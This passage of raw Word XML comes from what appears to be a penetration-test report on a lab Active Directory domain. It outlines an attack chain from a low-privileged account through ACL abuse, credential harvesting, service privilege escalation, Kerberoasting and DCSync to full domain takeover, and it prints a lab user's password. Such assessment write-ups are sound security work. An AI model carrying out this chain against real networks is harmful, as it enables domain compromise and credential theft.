            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="210988F4" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00B33193" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00B33193">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
              <w:t>Offline Password Cracker</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4608" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="05D7CC31" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00B33193" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00B33193">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
              <w:t>GPU-accelerated cracking of Kerberos TGS ticket hashes (etype 23 / RC4-HMAC) using wordlists.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="00B33193" w14:paraId="4DC830BC" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F4F7"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0457DFA3" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00B33193" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B33193">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>xfreerdp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2592" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F4F7"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3A2B1EF9" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00B33193" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00B33193">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
              <w:t>RDP Remote Desktop Client</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4608" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F4F7"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="234FF71F" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00B33193" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00B33193">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
              <w:t>Graphical user interface access to Windows hosts (MS01) for interactive service configuration.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="14027949" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00B33193" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="00B33193">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>Table 2: Tooling Selection and Rationale Matrix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF3A8F5" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00B33193" w:rsidRDefault="00A25106">
      <w:r w:rsidRPr="00B33193">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A584C3" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3. Methodology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E30ACD" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>3.1 Assumed-Breach Testing Framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28222BC6" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00AA4954" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA4954">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The assessment followed an assumed-breach methodology, simulating a scenario where a malicious threat actor has gained entry to the internal corporate network and obtained valid low-privileged credentials for a domain user account (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AA4954">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>hporter :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AA4954">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Gr8hambino!). This realistic threat model bypasses traditional perimeter defenses (firewalls, email filters, VPN MFA) and tests internal defense-in-depth controls, object permissions, service isolation, and detection capabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F6017A" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>3.2 Lab Network Setup &amp; Topology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A38827" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00AA4954" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA4954">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The target Active Directory lab environment was structured on subnet 172.16.8.0/24. The domain controller (DC01 at 172.16.8.3) managed identity services for INLANEFREIGHT.LOCAL, while a member server (MS01 at 172.16.8.50) hosted secondary applications and database services. The Red Team attack platform (172.16.8.100) communicated directly over SMB, WinRM, LDAP, and Kerberos protocols.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DAB0A0C" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00AA4954" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA4954">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Topology Description: </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4954">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Lab Network Architecture &amp; Subnet Demarcation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AD4BF1" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00AA4954" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA4954">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">DC01 (172.16.8.3): </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4954">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Domain Controller handling Kerberos authentication, Active Directory LDAP directory services, and DNS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444757BC" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00AA4954" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA4954">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">MS01 (172.16.8.50): </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4954">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows Server </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AA4954">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2019 member</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AA4954">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> server running WinRM, SQL Express backup routines, and local scheduled tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFD9272" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00AA4954" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA4954">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">DEV01 (172.16.8.10): </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4954">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Web application host utilized for initial credential recovery during initial access phase.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE826BC" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>3.3 Attack Lifecycle &amp; Privilege Escalation Phases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E22D5F0" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0087495E" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0087495E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The attack chain progressed through six distinct operational phases, moving from initial credential verification to full domain controller DCSync replication:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69761148" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0087495E" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0087495E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 1: Initial Foothold &amp; Authentication Verification - </w:t>
      </w:r>
      <w:r w:rsidRPr="0087495E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Validation of provided low-privileged user account (hporter) against SMB/LDAP endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7181E0BA" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0087495E" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0087495E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 2: Active Directory Graph Enumeration - </w:t>
      </w:r>
      <w:r w:rsidRPr="0087495E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Execution of BloodHound ingestion scripts to gather LDAP object permissions, ACLs, and trust relationships.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E973D27" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0087495E" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0087495E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 3: Domain Account Takeover &amp; Share Credential Harvesting - </w:t>
      </w:r>
      <w:r w:rsidRPr="0087495E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Exploitation of ForceChangePassword delegated rights to take over ssmalls, followed by network share spidering to harvest cleartext backup script credentials (backupadm).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B11C521" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0087495E" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0087495E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Phase 4: Lateral Movement &amp; Local Host Exploitation - </w:t>
      </w:r>
      <w:r w:rsidRPr="0087495E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>WinRM authentication to MS01, extraction of local deployment unattend.xml credentials (ilfserveradm), and local SYSTEM privilege escalation via vulnerable Sysax service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C45329" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0087495E" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0087495E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 5: LSA Secrets Dump &amp; Targeted Kerberoasting - </w:t>
      </w:r>
      <w:r w:rsidRPr="0087495E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Dumping LSA autologon registry secrets to capture mssqladm, setting a fake SPN on ttimmons via GenericWrite, and cracking the Kerberos TGS hash offline.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB7335E" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0087495E" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0087495E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 6: Privileged Group Escalation &amp; DCSync Domain Takeover - </w:t>
      </w:r>
      <w:r w:rsidRPr="0087495E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Leveraging GenericAll permissions to add ttimmons into the Server Admins group, exploiting GetChanges/GetChangesAll replication rights to DCSync all NTLM hashes, and Pass-the-Hash authentication as Administrator.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783A976E" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:r w:rsidRPr="0040297F">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD04195" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>4. Implementation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2270DD41" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0087495E" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0087495E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4.1 Lab Build Specifications &amp; Target Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE4BE49" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0087495E" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0087495E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The INLANEFREIGHT.LOCAL environment was provisioned to reflect real-world enterprise Active Directory misconfigurations accumulated over years of administrative changes. The Domain Controller ran Windows Server 2019 Datacenter edition, with Functional Level set to Windows Server 2016.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0864CECA" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0087495E" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0087495E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4.2 Active Directory Vulnerable Delegation Setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5DCDD0" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0087495E" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0087495E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>To facilitate the privilege escalation demonstration, several realistic administrative delegation oversights were configured across user accounts and custom security groups in the Active Directory object tree:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FAD6168" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0087495E" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0087495E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Delegated ACL Oversight 1: </w:t>
      </w:r>
      <w:r w:rsidRPr="0087495E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The hporter user account was delegated specific ACL rights allowing ForceChangePassword over ssmalls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097E9924" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0087495E" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0087495E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">File Share Permissions: </w:t>
      </w:r>
      <w:r w:rsidRPr="0087495E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The IT Department share on DC01 permitted Read access for all Domain Users, exposing plaintext operational scripts containing service credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C5C30F" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0087495E" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0087495E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Service Account Remote Access: </w:t>
      </w:r>
      <w:r w:rsidRPr="0087495E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The backupadm account possessed WinRM remote access rights on member server MS01.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D8ED24" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0087495E" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0087495E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Object Delegation Oversight 2: </w:t>
      </w:r>
      <w:r w:rsidRPr="0087495E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The mssqladm account was granted GenericWrite over user object ttimmons.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0E5DFC" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0087495E" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0087495E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Group Delegation Oversight: </w:t>
      </w:r>
      <w:r w:rsidRPr="0087495E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The ttimmons user held GenericAll control over the Server Admins custom group object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68387991" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0087495E" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0087495E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
